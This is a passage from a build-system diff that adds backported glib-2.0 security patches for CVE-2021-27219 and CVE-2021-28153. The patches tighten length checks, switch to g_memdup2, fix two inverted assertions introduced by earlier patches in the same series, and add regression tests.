+   gint oldest_index = 0;
+ 
+-  if (native_len <= 0)
++  if (native_len == 0)
+     return NULL;
+ 
+   saddr = NULL;
+@@ -5274,7 +5275,7 @@ cache_recv_address (GSocket *socket, str
+     {
+       GSocketAddress *tmp = socket->priv->recv_addr_cache[i].addr;
+       gpointer tmp_native = socket->priv->recv_addr_cache[i].native;
+-      gint tmp_native_len = socket->priv->recv_addr_cache[i].native_len;
++      gsize tmp_native_len = socket->priv->recv_addr_cache[i].native_len;
+ 
+       if (!tmp)
+         continue;
+@@ -5304,7 +5305,7 @@ cache_recv_address (GSocket *socket, str
+       g_free (socket->priv->recv_addr_cache[oldest_index].native);
+     }
+ 
+-  socket->priv->recv_addr_cache[oldest_index].native = g_memdup (native, native_len);
++  socket->priv->recv_addr_cache[oldest_index].native = g_memdup2 (native, native_len);
+   socket->priv->recv_addr_cache[oldest_index].native_len = native_len;
+   socket->priv->recv_addr_cache[oldest_index].addr = g_object_ref (saddr);
+   socket->priv->recv_addr_cache[oldest_index].last_used = g_get_monotonic_time ();
+@@ -5452,6 +5453,9 @@ g_socket_receive_message_with_timeout (G
+     /* do it */
+     while (1)
+       {
++        /* addrlen has to be of type int because that’s how WSARecvFrom() is defined */
++        G_STATIC_ASSERT (sizeof addr <= G_MAXINT);
++
+ 	addrlen = sizeof addr;
+ 	if (address)
+ 	  result = WSARecvFrom (socket->priv->fd,
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch
new file mode 100644
index 0000000000..63fda0b600
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch
@@ -0,0 +1,59 @@
+From 777b95a88f006d39d9fe6d3321db17e7b0d4b9a4 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 14:07:39 +0000
+Subject: [PATCH 10/11] gtlspassword: Forbid very long TLS passwords
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The public API `g_tls_password_set_value_full()` (and the vfunc it
+invokes) can only accept a `gssize` length. Ensure that nul-terminated
+strings passed to `g_tls_password_set_value()` can’t exceed that length.
+Use `g_memdup2()` to avoid an overflow if they’re longer than
+`G_MAXUINT` similarly.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gtlspassword.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/gio/gtlspassword.c b/gio/gtlspassword.c
+index 1e437a7b6..dbcec41a8 100644
+--- a/gio/gtlspassword.c
++++ b/gio/gtlspassword.c
+@@ -23,6 +23,7 @@
+ #include "glibintl.h"
+ 
+ #include "gioenumtypes.h"
++#include "gstrfuncsprivate.h"
+ #include "gtlspassword.h"
+ 
+ #include <string.h>
+@@ -287,9 +288,14 @@ g_tls_password_set_value (GTlsPassword  *password,
+   g_return_if_fail (G_IS_TLS_PASSWORD (password));
+ 
+   if (length < 0)
+-    length = strlen ((gchar *)value);
++    {
++      /* FIXME: g_tls_password_set_value_full() doesn’t support unsigned gsize */
++      gsize length_unsigned = strlen ((gchar *) value);
++      g_return_if_fail (length_unsigned > G_MAXSSIZE);
++      length = (gssize) length_unsigned;
++    }
+ 
+-  g_tls_password_set_value_full (password, g_memdup (value, length), length, g_free);
++  g_tls_password_set_value_full (password, g_memdup2 (value, (gsize) length), length, g_free);
+ }
+ 
+ /**
+-- 
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch
new file mode 100644
index 0000000000..a620a49269
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch
@@ -0,0 +1,63 @@
+From ecdf91400e9a538695a0895b95ad7e8abcdf1749 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 14:09:40 +0000
+Subject: [PATCH 11/11] giochannel: Forbid very long line terminator strings
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The public API `GIOChannel.line_term_len` is only a `guint`. Ensure that
+nul-terminated strings passed to `g_io_channel_set_line_term()` can’t
+exceed that length. Use `g_memdup2()` to avoid a warning (`g_memdup()`
+is due to be deprecated), but not to avoid a bug, since it’s also
+limited to `G_MAXUINT`.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/giochannel.c | 17 +++++++++++++----
+ 1 file changed, 13 insertions(+), 4 deletions(-)
+
+diff --git a/glib/giochannel.c b/glib/giochannel.c
+index c6a89d6e0..4dec20f77 100644
+--- a/glib/giochannel.c
++++ b/glib/giochannel.c
+@@ -887,16 +887,25 @@ g_io_channel_set_line_term (GIOChannel	*channel,
+                             const gchar	*line_term,
+ 			    gint         length)
+ {
++  guint length_unsigned;
++
+   g_return_if_fail (channel != NULL);
+   g_return_if_fail (line_term == NULL || length != 0); /* Disallow "" */
+ 
+   if (line_term == NULL)
+-    length = 0;
+-  else if (length < 0)
+-    length = strlen (line_term);
++    length_unsigned = 0;
++  else if (length >= 0)
++    length_unsigned = (guint) length;
++  else
++    {
++      /* FIXME: We’re constrained by line_term_len being a guint here */
++      gsize length_size = strlen (line_term);
++      g_return_if_fail (length_size > G_MAXUINT);
++      length_unsigned = (guint) length_size;
++    }
+ 
+   g_free (channel->line_term);
+-  channel->line_term = line_term ? g_memdup (line_term, length) : NULL;
++  channel->line_term = line_term ? g_memdup2 (line_term, length_unsigned) : NULL;
+   channel->line_term_len = length;
+ }
+ 
+-- 
+GitLab
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch
new file mode 100644
index 0000000000..3047062f54
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch
@@ -0,0 +1,36 @@
+From f8273b9aded135fe07094faebd527e43851aaf6e Mon Sep 17 00:00:00 2001
+From: "Jan Alexander Steffens (heftig)" <jan.steffens@gmail.com>
+Date: Sun, 7 Feb 2021 23:32:40 +0100
+Subject: [PATCH 1/5] giochannel: Fix length_size bounds check
+
+The inverted condition is an obvious error introduced by ecdf91400e9a.
+
+Fixes https://gitlab.gnome.org/GNOME/glib/-/issues/2323
+
+(cherry picked from commit a149bf2f9030168051942124536e303af8ba6176)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/giochannel.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/glib/giochannel.c b/glib/giochannel.c
+index 4dec20f77..c3f3102ff 100644
+--- a/glib/giochannel.c
++++ b/glib/giochannel.c
+@@ -896,7 +896,7 @@ g_io_channel_set_line_term (GIOChannel	*channel,
+     {
+       /* FIXME: We’re constrained by line_term_len being a guint here */
+       gsize length_size = strlen (line_term);
+-      g_return_if_fail (length_size > G_MAXUINT);
++      g_return_if_fail (length_size <= G_MAXUINT);
+       length_unsigned = (guint) length_size;
+     }
+ 
+-- 
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch
new file mode 100644
index 0000000000..2ba26075df
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch
@@ -0,0 +1,38 @@
+From e069c50467712e6d607822afd6b6c15c2c343dff Mon Sep 17 00:00:00 2001
+From: Simon McVittie <smcv@collabora.com>
+Date: Mon, 8 Feb 2021 10:34:50 +0000
+Subject: [PATCH 2/5] giochannel: Don't store negative line_term_len in
+ GIOChannel struct
+
+Adding test coverage indicated that this was another bug in 0cc11f74.
+
+Fixes: 0cc11f74 "giochannel: Forbid very long line terminator strings"
+Resolves: https://gitlab.gnome.org/GNOME/glib/-/issues/2323
+Signed-off-by: Simon McVittie <smcv@collabora.com>
+(cherry picked from commit 5dc8b0014c03e7491d93b90275ab442e888a9628)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/giochannel.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/glib/giochannel.c b/glib/giochannel.c
+index c3f3102ff..19bb06ba6 100644
+--- a/glib/giochannel.c
++++ b/glib/giochannel.c
+@@ -902,7 +902,7 @@ g_io_channel_set_line_term (GIOChannel	*channel,
+ 
+   g_free (channel->line_term);
+   channel->line_term = line_term ? g_memdup2 (line_term, length_unsigned) : NULL;
+-  channel->line_term_len = length;
++  channel->line_term_len = length_unsigned;
+ }
+ 
+ /**
+-- 
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch
new file mode 100644
index 0000000000..2c388b4bbb
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch
@@ -0,0 +1,38 @@
+From 4506d1859a863087598c8d122740bae25b65b099 Mon Sep 17 00:00:00 2001
+From: Simon McVittie <smcv@collabora.com>
+Date: Mon, 8 Feb 2021 10:04:48 +0000
+Subject: [PATCH 4/5] gtlspassword: Fix inverted assertion
+
+The intention here was to assert that the length of the password fits
+in a gssize. Passwords more than half the size of virtual memory are
+probably excessive.
+
+Fixes: a8b204ff "gtlspassword: Forbid very long TLS passwords"
+Signed-off-by: Simon McVittie <smcv@collabora.com>
+(cherry picked from commit 61bb52ec42de1082bfb06ce1c737fc295bfe60b8)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gtlspassword.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/gio/gtlspassword.c b/gio/gtlspassword.c
+index dbcec41a8..bd86a6dfe 100644
+--- a/gio/gtlspassword.c
++++ b/gio/gtlspassword.c
+@@ -291,7 +291,7 @@ g_tls_password_set_value (GTlsPassword  *password,
+     {
+       /* FIXME: g_tls_password_set_value_full() doesn’t support unsigned gsize */
+       gsize length_unsigned = strlen ((gchar *) value);
+-      g_return_if_fail (length_unsigned > G_MAXSSIZE);
++      g_return_if_fail (length_unsigned <= G_MAXSSIZE);
+       length = (gssize) length_unsigned;
+     }
+ 
+-- 
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch
new file mode 100644
index 0000000000..356e986fe0
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch
@@ -0,0 +1,100 @@
+From 3d1550354c3c6a8491c39881752d51cb7515f2c2 Mon Sep 17 00:00:00 2001
+From: Simon McVittie <smcv@collabora.com>
+Date: Mon, 8 Feb 2021 10:22:39 +0000
+Subject: [PATCH 5/5] tls-interaction: Add test coverage for various ways to
+ set the password
+
+Signed-off-by: Simon McVittie <smcv@collabora.com>
+(cherry picked from commit df4501316ca3903072400504a5ea76498db19538)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/tests/tls-interaction.c | 55 +++++++++++++++++++++++++++++++++++++
+ 1 file changed, 55 insertions(+)
+
+diff --git a/gio/tests/tls-interaction.c b/gio/tests/tls-interaction.c
+index 4f0737d7e..5661e8e0d 100644
+--- a/gio/tests/tls-interaction.c
++++ b/gio/tests/tls-interaction.c
+@@ -174,6 +174,38 @@ test_interaction_ask_password_finish_failure (GTlsInteraction    *interaction,
+ }
+ 
+ 
++/* Return a copy of @str that is allocated in a silly way, to exercise
++ * custom free-functions. The returned pointer points to a copy of @str
++ * in a buffer of the form "BEFORE \0 str \0 AFTER". */
++static guchar *
++special_dup (const char *str)
++{
++  GString *buf = g_string_new ("BEFORE");
++  guchar *ret;
++
++  g_string_append_c (buf, '\0');
++  g_string_append (buf, str);
++  g_string_append_c (buf, '\0');
++  g_string_append (buf, "AFTER");
++  ret = (guchar *) g_string_free (buf, FALSE);
++  return ret + strlen ("BEFORE") + 1;
++}
++
++
++/* Free a copy of @str that was made with special_dup(), after asserting
++ * that it has not been corrupted. */
++static void
++special_free (gpointer p)
++{
++  gchar *s = p;
++  gchar *buf = s - strlen ("BEFORE") - 1;
++
++  g_assert_cmpstr (buf, ==, "BEFORE");
++  g_assert_cmpstr (s + strlen (s) + 1, ==, "AFTER");
++  g_free (buf);
++}
++
++
+ static GTlsInteractionResult
+ test_interaction_ask_password_sync_success (GTlsInteraction    *interaction,
+                                             GTlsPassword       *password,
+@@ -181,6 +213,8 @@ test_interaction_ask_password_sync_success (GTlsInteraction    *interaction,
+                                             GError            **error)
+ {
+   TestInteraction *self;
++  const guchar *value;
++  gsize len;
+ 
+   g_assert (TEST_IS_INTERACTION (interaction));
+   self = TEST_INTERACTION (interaction);
+@@ -192,6 +226,27 @@ test_interaction_ask_password_sync_success (GTlsInteraction    *interaction,
+   g_assert (error != NULL);
+   g_assert (*error == NULL);
+ 
++  /* Exercise different ways to set the value */
++  g_tls_password_set_value (password, (const guchar *) "foo", 4);
++  len = 0;
++  value = g_tls_password_get_value (password, &len);
++  g_assert_cmpmem (value, len, "foo", 4);
++
++  g_tls_password_set_value (password, (const guchar *) "bar", -1);
++  len = 0;
++  value = g_tls_password_get_value (password, &len);
++  g_assert_cmpmem (value, len, "bar", 3);
++
++  g_tls_password_set_value_full (password, special_dup ("baa"), 4, special_free);
++  len = 0;
++  value = g_tls_password_get_value (password, &len);
++  g_assert_cmpmem (value, len, "baa", 4);
++
++  g_tls_password_set_value_full (password, special_dup ("baz"), -1, special_free);
++  len = 0;
++  value = g_tls_password_get_value (password, &len);
++  g_assert_cmpmem (value, len, "baz", 3);
++
+   /* Don't do this in real life. Include a null terminator for testing */
+   g_tls_password_set_value (password, (const guchar *)"the password", 13);
+   return G_TLS_INTERACTION_HANDLED;
+-- 
+GitLab
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch
new file mode 100644
index 0000000000..dd43689aae
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch
@@ -0,0 +1,49 @@
+From cb9ee701ef46c1819eed4e2a4dc181682bdfc176 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 10 Feb 2021 21:16:39 +0000
+Subject: [PATCH 1/3] gkeyfilesettingsbackend: Fix basename handling when group
+ is unset
+
+Fix an effective regression in commit
+7781a9cbd2fd0aa84bee0f4eee88470640ff6706, which happens when
+`convert_path()` is called with a `key` which contains no slashes. In
+that case, the `key` is entirely the `basename`.
+
+Prior to commit 7781a9cb, the code worked through a fluke of `i == -1`
+cancelling out with the various additions in the `g_memdup()` call, and
+effectively resulting in `g_strdup (key)`.
+
+Spotted by Guido Berhoerster.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gkeyfilesettingsbackend.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c
+index 25b057672..861c3a661 100644
+--- a/gio/gkeyfilesettingsbackend.c
++++ b/gio/gkeyfilesettingsbackend.c
+@@ -185,7 +185,12 @@ convert_path (GKeyfileSettingsBackend  *kfsb,
+     }
+ 
+   if (basename)
+-    *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key));
++    {
++      if (last_slash != NULL)
++        *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key));
++      else
++        *basename = g_strdup (key);
++    }
+ 
+   return TRUE;
+ }
+-- 
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch
new file mode 100644
index 0000000000..04503641c3
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch
@@ -0,0 +1,43 @@
+From 31e0d403ba635dbbacbfbff74295e5db02558d76 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 10 Feb 2021 21:19:30 +0000
+Subject: [PATCH 2/3] gkeyfilesettingsbackend: Disallow empty key or group
+ names
+
+These should never have been allowed; they will result in precondition
+failures from the `GKeyFile` later on in the code.
+
+A test will be added for this shortly.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gkeyfilesettingsbackend.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c
+index 861c3a661..de216e615 100644
+--- a/gio/gkeyfilesettingsbackend.c
++++ b/gio/gkeyfilesettingsbackend.c
+@@ -158,6 +158,13 @@ convert_path (GKeyfileSettingsBackend  *kfsb,
+ 
+   last_slash = strrchr (key, '/');
+ 
++  /* Disallow empty group names or key names */
++  if (key_len == 0 ||
++      (last_slash != NULL &&
++       (*(last_slash + 1) == '\0' ||
++        last_slash == key)))
++    return FALSE;
++
+   if (kfsb->root_group)
+     {
+       /* if a root_group was specified, make sure the user hasn't given
+-- 
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch
new file mode 100644
index 0000000000..65f59287a8
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch
@@ -0,0 +1,232 @@
+Backport of:
+
+From 221c26685354dea2b2732df94404e8e5e77a1591 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 10 Feb 2021 21:21:36 +0000
+Subject: [PATCH 3/3] tests: Add tests for key name handling in the keyfile
+ backend
+
+This tests the two recent commits.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/tests/gsettings.c | 170 +++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 169 insertions(+), 1 deletion(-)
+
+--- a/gio/tests/gsettings.c
++++ b/gio/tests/gsettings.c
+@@ -1,3 +1,4 @@
++#include <errno.h>
+ #include <stdlib.h>
+ #include <locale.h>
+ #include <libintl.h>
+@@ -1740,6 +1741,14 @@ key_changed_cb (GSettings *settings, con
+   (*b) = TRUE;
+ }
+ 
++typedef struct
++{
++  const gchar *path;
++  const gchar *root_group;
++  const gchar *keyfile_group;
++  const gchar *root_path;
++} KeyfileTestData;
++
+ /*
+  * Test that using a keyfile works
+  */
+@@ -1834,7 +1843,11 @@ test_keyfile (Fixture       *fixture,
+   g_free (str);
+ 
+   g_settings_set (settings, "farewell", "s", "cheerio");
+-  
++
++  /* Check that empty keys/groups are not allowed. */
++  g_assert_false (g_settings_is_writable (settings, ""));
++  g_assert_false (g_settings_is_writable (settings, "/"));
++
+   /* When executing as root, changing the mode of the keyfile will have
+    * no effect on the writability of the settings.
+    */
+@@ -1866,6 +1879,149 @@ test_keyfile (Fixture       *fixture,
+   g_free (keyfile_path);
+ }
+ 
++/*
++ * Test that using a keyfile works with a schema with no path set.
++ */
++static void
++test_keyfile_no_path (Fixture       *fixture,
++                      gconstpointer  user_data)
++{
++  const KeyfileTestData *test_data = user_data;
++  GSettingsBackend *kf_backend;
++  GSettings *settings;
++  GKeyFile *keyfile;
++  gboolean writable;
++  gchar *key = NULL;
++  GError *error = NULL;
++  gchar *keyfile_path = NULL, *store_path = NULL;
++
++  keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL);
++  store_path = g_build_filename (keyfile_path, "gsettings.store", NULL);
++  kf_backend = g_keyfile_settings_backend_new (store_path, test_data->root_path, test_data->root_group);
++  settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, test_data->path);
++  g_object_unref (kf_backend);
++
++  g_settings_reset (settings, "test-boolean");
++  g_assert_true (g_settings_get_boolean (settings, "test-boolean"));
++
++  writable = g_settings_is_writable (settings, "test-boolean");
++  g_assert_true (writable);
++  g_settings_set (settings, "test-boolean", "b", FALSE);
++
++  g_assert_false (g_settings_get_boolean (settings, "test-boolean"));
++
++  g_settings_delay (settings);
++  g_settings_set (settings, "test-boolean", "b", TRUE);
++  g_settings_apply (settings);
++
++  keyfile = g_key_file_new ();
++  g_assert_true (g_key_file_load_from_file (keyfile, store_path, 0, NULL));
++
++  g_assert_true (g_key_file_get_boolean (keyfile, test_data->keyfile_group, "test-boolean", NULL));
++
++  g_key_file_free (keyfile);
++
++  g_settings_reset (settings, "test-boolean");
++  g_settings_apply (settings);
++  keyfile = g_key_file_new ();
++  g_assert_true (g_key_file_load_from_file (keyfile, store_path, 0, NULL));
++
++  g_assert_false (g_key_file_get_string (keyfile, test_data->keyfile_group, "test-boolean", &error));
++  g_assert_error (error, G_KEY_FILE_ERROR, G_KEY_FILE_ERROR_KEY_NOT_FOUND);
++  g_clear_error (&error);
++
++  /* Check that empty keys/groups are not allowed. */
++  g_assert_false (g_settings_is_writable (settings, ""));
++  g_assert_false (g_settings_is_writable (settings, "/"));
++
++  /* Keys which ghost the root group name are not allowed. This can only be
++   * tested when the path is `/` as otherwise it acts as a prefix and prevents
++   * any ghosting. */
++  if (g_str_equal (test_data->path, "/"))
++    {
++      key = g_strdup_printf ("%s/%s", test_data->root_group, "");
++      g_assert_false (g_settings_is_writable (settings, key));
++      g_free (key);
++
++      key = g_strdup_printf ("%s/%s", test_data->root_group, "/");
++      g_assert_false (g_settings_is_writable (settings, key));
++      g_free (key);
++
++      key = g_strdup_printf ("%s/%s", test_data->root_group, "test-boolean");
++      g_assert_false (g_settings_is_writable (settings, key));
++      g_free (key);
++    }
++
++  g_key_file_free (keyfile);
++  g_object_unref (settings);
++
++  /* Clean up the temporary directory. */
++  g_assert_cmpint (g_chmod (keyfile_path, 0777) == 0 ? 0 : errno, ==, 0);
++  g_assert_cmpint (g_remove (store_path) == 0 ? 0 : errno, ==, 0);
++  g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0);
++  g_free (store_path);
++  g_free (keyfile_path);
++}
++
++/*
++ * Test that a keyfile rejects writes to keys outside its root path.
++ */
++static void
++test_keyfile_outside_root_path (Fixture       *fixture,
++                                gconstpointer  user_data)
++{
++  GSettingsBackend *kf_backend;
++  GSettings *settings;
++  gchar *keyfile_path = NULL, *store_path = NULL;
++
++  keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL);
++  store_path = g_build_filename (keyfile_path, "gsettings.store", NULL);
++  kf_backend = g_keyfile_settings_backend_new (store_path, "/tests/basic-types/", "root");
++  settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, "/tests/");
++  g_object_unref (kf_backend);
++
++  g_assert_false (g_settings_is_writable (settings, "test-boolean"));
++
++  g_object_unref (settings);
++
++  /* Clean up the temporary directory. The keyfile probably doesn’t exist, so
++   * don’t error on failure. */
++  g_remove (store_path);
++  g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0);
++  g_free (store_path);
++  g_free (keyfile_path);
++}
++
++/*
++ * Test that a keyfile rejects writes to keys in the root if no root group is set.
++ */
++static void
++test_keyfile_no_root_group (Fixture       *fixture,
++                            gconstpointer  user_data)
++{
++  GSettingsBackend *kf_backend;
++  GSettings *settings;
++  gchar *keyfile_path = NULL, *store_path = NULL;
++
++  keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL);
++  store_path = g_build_filename (keyfile_path, "gsettings.store", NULL);
++  kf_backend = g_keyfile_settings_backend_new (store_path, "/", NULL);
++  settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, "/");
++  g_object_unref (kf_backend);
++
++  g_assert_false (g_settings_is_writable (settings, "test-boolean"));
++  g_assert_true (g_settings_is_writable (settings, "child/test-boolean"));
++
++  g_object_unref (settings);
++
++  /* Clean up the temporary directory. The keyfile probably doesn’t exist, so
++   * don’t error on failure. */
++  g_remove (store_path);
++  g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0);
++  g_free (store_path);
++  g_free (keyfile_path);
++}
++
+ /* Test that getting child schemas works
+  */
+ static void
+@@ -2844,6 +3000,14 @@ main (int argc, char *argv[])
+   gchar *override_text;
+   gchar *enums;
+   gint result;
++  const KeyfileTestData keyfile_test_data_explicit_path = { "/tests/", "root", "tests", "/" };
++  const KeyfileTestData keyfile_test_data_empty_path = { "/", "root", "root", "/" };
++  const KeyfileTestData keyfile_test_data_long_path = {
++    "/tests/path/is/very/long/and/this/makes/some/comparisons/take/a/different/branch/",
++    "root",
++    "tests/path/is/very/long/and/this/makes/some/comparisons/take/a/different/branch",
++    "/"
++  };
+ 
+ /* Meson build sets this */
+ #ifdef TEST_LOCALE_PATH
+@@ -2967,6 +3131,11 @@ main (int argc, char *argv[])
+     }
+ 
+   g_test_add ("/gsettings/keyfile", Fixture, NULL, setup, test_keyfile, teardown);
++  g_test_add ("/gsettings/keyfile/explicit-path", Fixture, &keyfile_test_data_explicit_path, setup, test_keyfile_no_path, teardown);
++  g_test_add ("/gsettings/keyfile/empty-path", Fixture, &keyfile_test_data_empty_path, setup, test_keyfile_no_path, teardown);
++  g_test_add ("/gsettings/keyfile/long-path", Fixture, &keyfile_test_data_long_path, setup, test_keyfile_no_path, teardown);
++  g_test_add ("/gsettings/keyfile/outside-root-path", Fixture, NULL, setup, test_keyfile_outside_root_path, teardown);
++  g_test_add ("/gsettings/keyfile/no-root-group", Fixture, NULL, setup, test_keyfile_no_root_group, teardown);
+   g_test_add_func ("/gsettings/child-schema", test_child_schema);
+   g_test_add_func ("/gsettings/strinfo", test_strinfo);
+   g_test_add_func ("/gsettings/enums", test_enums);
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch
new file mode 100644
index 0000000000..c89ca20726
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch
@@ -0,0 +1,27 @@
+From 78420a75aeb70569a8cd79fa0fea7b786b6f785f Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 24 Feb 2021 17:33:38 +0000
+Subject: [PATCH 1/5] glocalfileoutputstream: Fix a typo in a comment
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
